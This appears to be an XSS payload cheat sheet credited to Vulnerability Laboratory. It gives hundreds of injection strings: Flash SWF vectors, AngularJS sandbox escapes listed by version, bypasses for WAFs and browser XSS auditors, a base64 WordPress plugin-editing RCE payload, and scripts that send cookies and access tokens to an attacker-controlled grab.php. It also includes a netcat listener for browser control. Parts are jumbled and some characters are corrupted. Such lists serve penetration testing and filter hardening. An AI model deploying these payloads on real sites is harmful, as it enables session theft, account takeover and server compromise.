![]()
exp/*
Flash SWF XSS
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
XML Schema
XSS
]]>
<IMG SRC="javascript:alert('XSS')">
XSS'\x22"%22>4<%\u0022/*
alert("XSS")'); ?>
Redirect 302 /test.jpg http://test.com/admin.asp&deleteuser
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
PT SRC="http://test.com/xss.js">
XSS
XSS
XSS
XSS
%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
<iframe src=http://test.de>
<iframe src=http://test.de>
PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
<\x00img src='1' onerror=alert(0) />
alert(1)
“>![]( "test-xss")
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
alert(0)
TESTER
TESTER
TESTER
TESTER
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
';
'); }
(IE)
(Firefox, Chrome, Safari)
(Firefox, Chrome, Safari)
http://test.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2
(Firefox)
http://test.com/something.jsp?inject=#alert(1)
">
xxs link
<![CDATA[
<a onmouseover=alert(document.cookie)>xxs link</a>
<a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>
<div onactivate=alert('XSSTEST') id=xss style=overflow:scroll>
Ij48IjxpbWcgc3JjPSJ4Ij4lMjAlMjA+IjxpZnJhbWUgc3JjPWE+JTIwPGlmcmFtZT4=
String Char Eval
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
'a'.constructor.prototype['char\u0041t']
'a'.constructor.prototype['char\u0041t']=''.concat;
{{'a'.constructor.prototype['char\u0041t']=''.concat;
$eval("x='\"+(y='if(!window\\u002?x)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{
({}.toString()).constructor.prototype.charAt=[].join;
$eval(({}.toString()).constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
}}
{{
x=toString();x.constructor.prototype.charAt=x.constructor.prototype.concat;
$eval(x.constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
}}
t=o.anchor(true);//<a name="true">[object Undefined]</a>
{{
c=[];
o=toString();
t=o.anchor(true);
f=o.anchor(false);
c.push(o[5]);
c.push(o[1]);
c.push(t[3]);
c.push(f[12]);
c.push(t[9]);
c.push(t[10]);
c.push(t[11]);
c.push(o[5]);
c.push(t[9]);
c.push(o[1]);
c.push(t[10]);
a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[c.join([])].fromCharCode(97,108,101,114,116,40,49,41))()
}}
<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
<svg/onload=eval(name)>
<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you controll the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
<!-- Just a casual script -->
<script/src=//?.?></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the URL -->
<iframe/onload=eval('`'+URL)>
<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\?.??/>
<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//?.? />">
<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\?.??/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//?.?></script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML unless Firefox -->
<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\?.?/)>
<!-- Uses external script as import, triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\?.?/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\?.?/)>
HTML Context
Tag Injection <svg onload=alert(1)>
“><svg onload=alert(1)//
HTML Context
Inline Injection “onmouseover=alert(1)//
“autofocus/onfocus=alert(1)//
Javascript Context
Code Injection ‘-alert(1)-‘
‘-alert(1)//
Javascript Context
Code Injection
(escaping the escape) \’-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
PHP_SELF Injection
http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
Without Parenthesis
<svg onload=alert`1`>
<svg onload=alert(1)>
<svg onload=alert(1)>
<svg onload=alert(1)>
Filter Bypass
Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
Body Tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
Code Reuse
Inline Script <script>alert(1)//
<script>alert(1)<!–
Code Reuse
Regular Script <script src=//localhost:8080/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding Mixed Case Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1 <X onxxx=1
<x OnXxx=1
<X OnXxx=1Doubling
<x onxxx=1 onxxx=1 <x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1=’1’onxxx=1
<x 1=”1?onxxx=1 <[S]x onx[S]xx=1
[S] = stripped char or string
<x </onxxx=1
<x 1=”>” onxxx=1
<http://onxxx%3D1/
Generic Source Breaking
<x onxxx=alert(1) 1=’
Browser Control
<svg onload=setInterval(function(){with(document)body.
appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>$ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection Double Reflection
Single Input Single Input (script-based)
‘onload=alert(1)><svg/1=’ ‘>alert(1)</script><script/1=’
*/alert(1)</script><script>/*
Triple Reflection
Single Input Single Input (script-based)
*/alert(1)”>’onload=”/*<svg/1=’
`-alert(1)”>’onload=”`<svg/1=’ */</script>’>alert(1)/*<script/1=’
Multi Input Double Input Triple Input
p=<svg/1=’&q=’onload=alert(1)>
p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS
<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload Injection in Filename
“><img src=1 onerror=alert(1)>.gifInjection in Metadata
$ exiftool -Artist='”><img src=1 onerror=alert(1)>’ FILENAME.jpegInjection with SVG File
<svg xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.domain)”/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
Google Chrome
Auditor Bypass
<script src=”data:,alert(1)//
“><script src=data:,alert(1)//<script src=”//localhost:8080/1.js#
“><script src=//localhost:8080/1.js#<link rel=import href=”data:text/html,<script>alert(1)</script>
“><link rel=import href=data:text/html,<script>alert(1)</script>
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
Chrome < v60 beta XSS-Auditor Bypass
<script src="data:,alert(1)%250A-->
Other Chrome XSS-Auditor Bypasses
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
Safari XSS Vector
<script>location.href;'javascript:alert%281%29'</script>
XSS Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
PHP File for XHR Remote Call
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
<svg/onload=javascript:void(0)?void(0):void(0)?void(0):void(0)?void(0):void(0)?void(0):confirm(location)>
Shortest PoC
<base href=//0>
$ while:; do echo “alert(1)” | nc -lp80; done
Portable WordPress RCE <script/src=”data:,eval(atob(location.hash.slice(1)))//#
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
Invisble JS Alert
([,?,,,,??]=[]+{},[???,??,????,???,,?????,????,??????,,,?????]=[!!?]+!?+?.?)
[??+=?+?????+??????+???+??+????+??+???+?+??][??]
(?????+????+???+??+???+'`#JS!`')``
Bypass word blacklist with code evaluation
eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;
Markdown XSS
[a](javascript:confirm(1))
[a](javascript://www.test.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
[a]:(?javascript:alert(1))
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
Angular JS
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
{{
'a'.constructor.prototype.charAt=[].join;
eval('x=1} } };alert(1)//');
}}
AngularJS Template Injection based XSS
1.0.1 - 1.1.5
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1.3.0
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.19
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
1.6.0+ (no Expression Sandbox)
{{constructor.constructor('alert(1)')()}}
Content Security Policy (CSP) bypass via JSONP endpoints
Grab the target's CSP:
curl -I http://example.com | grep 'Content-Security-Policy'
Lightweight Markup Languages
RubyDoc (.rdoc)
XSS[JavaScript:alert(1)]
Textile (.textile)
"Test link":javascript:alert(1)
reStructuredText (.rst)
`Test link`__.
__ javascript:alert(document.domain)
Unicode characters
†‡•<img src=a onerror=javascript:alert('test')>…‰€
Sanbox Bypasses
{{constructor.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
{{constructor.constructor('alert(1)')()}}
Kona WAF (Akamai) Bypass
\');confirm(1);//
ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
Wordfence XSS Bypasses
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Incapsula WAF Bypasses
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
jQuery < 3.0.0 XSS
$.get('http://sakurity.com/jqueryxss')
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
Find any cross domain requests to untrusted domains which may inadvertently execute script.
Find any requests to trusted API endpoints where script can be injected into data sources.
URL verification bypasses (works without 	 too)
javas	cript://www.google.com/%0Aalert(1)
Signal Messenger Payloads
http://testdomain/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PENTEST
http://testdomain/?p=%3d%3Ciframe%20src=\\DESKTOP-[LOCALPATH]\Temp\rce.html%3E
http://testdomain/?p=%3d%3Ciframe%20src=\\xxx.xxx.xxx.xxx\Temp\rce.html%3E
http://testdomain/?p=%3Ciframe%20src="testfile.html"%3E%3C/iframe%3E%20PENTEST
http://testdomain/?p=%3Ciframe%20srcdoc="<p>PENTEST</p>"%3E%3C/iframe%3E
http://testdomain/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E
http://testdomain/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E
http://testdomain/?p=%3Cform%20method='POST'%20action='https://domain.de/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E
XSS SVG (Short)
<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]]]><![CDATA[></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]]]><![CDATA[></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]]]><![CDATA[></svg>
Waf Engine Bypass
<svg onload\r\n=$.globalEval("al"+"ert()");>
<img onload\r\n=$.globalEval("al"+"ert()");>
<iframe src="\\" onload\r\n=$.globalEval("al"+"ert()");>
<scrpt>confrm()</scrpt>
h1%6f%6eoNclicK=alert`hacked`CLICK HERE
Tiny Payloads
<svg/onload=eval(name)>
<style/onload=eval(name)>
<svg/onload=eval(`'`+URL)>
<svg/onload=location=name>
<style/onerror=eval(name)>
<script/src=//NJ.₨></script>
<svg/onload=import(/\NJ.₨/)>
<iframe/onload=src=top.name>
<svg><svg/onload=eval(name)>
<style/onload=eval(`'`+URL)>
<iframe/onload=eval(`'`+URL)>
<style/onload=write(URL)>
<iframe/onload=write(URL)>
<style/onload=import(/\NJ.₨/)>
<audio/src/onerror=eval(name)>
<iframe/onload=import(/\NJ.₨/)>
<img/src/onerror=eval(`'`+URL)>
<iframe/onload=src=top[0].name+/\NJ.₨/>
<iframe/onload=src=contentWindow.name+/\NJ.₨/>
<iframe/srcdoc="<script/src=//NJ.₨></script>">
Data grab JS / PHP
<script>document.location='http://localhost:8080/XSS/grab.php?c='+document.cookie</script>
<script>document.location='http://localhost:8080/XSS/grab.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost:8080/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost:8080/cookie.php?c='+localStorage.getItem('access_token');</script>
-------------------------------------------------------------------
- by Vulnerability Laboratory (https://www.vulnerability-lab.com) -
-------------------------------------------------------------------]]> |